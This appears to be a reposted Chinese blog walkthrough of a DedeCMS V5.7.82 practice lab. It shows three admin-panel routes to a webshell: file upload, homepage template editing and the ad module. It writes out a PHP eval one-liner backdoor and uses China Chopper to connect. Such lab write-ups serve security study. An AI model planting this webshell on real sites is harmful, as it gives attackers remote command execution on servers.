您的位置:首页 > 房产 > 家装 > DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

2024/12/23 10:54:02 来源:https://blog.csdn.net/weixin_57240513/article/details/140887869  浏览:    关键词:DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下——访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议——继续

image-20240803102752870

继续

image-20240803102813890

配置后——点击继续

image-20240803103345527

进入后台

image-20240803103604921

登录后台——填写用户名密码。

image-20240803103739973

方法一:上传shell文件

后台——核心——附件管理——上传新文件。

image-20240803104113905

访问/dedecms/uploads/uploads/shell.php

image-20240803104749518

使用菜刀工具连接

image-20240803104825600

进入了目录资源管理器

image-20240803104916135

方法二:模板修改index.html

模板——默认模板管理——修改主页模板

image-20240803105200658

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

image-20240803105614576

保存

image-20240803105716113

点击生成——更新主页html——配置一下——点击更新。

image-20240803110157053

浏览——访问/dedecms/uploads/index.php

image-20240803110300330

使用菜刀连接

image-20240803110335130

方法三:广告模块任意命令插入shell

利用广告模块

image-20240803110512726

插入一句话木马

image-20240803110739224

点击代码——修改

image-20240803110823797

image-20240803110923355

使用菜刀连接

image-20240803111100311

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com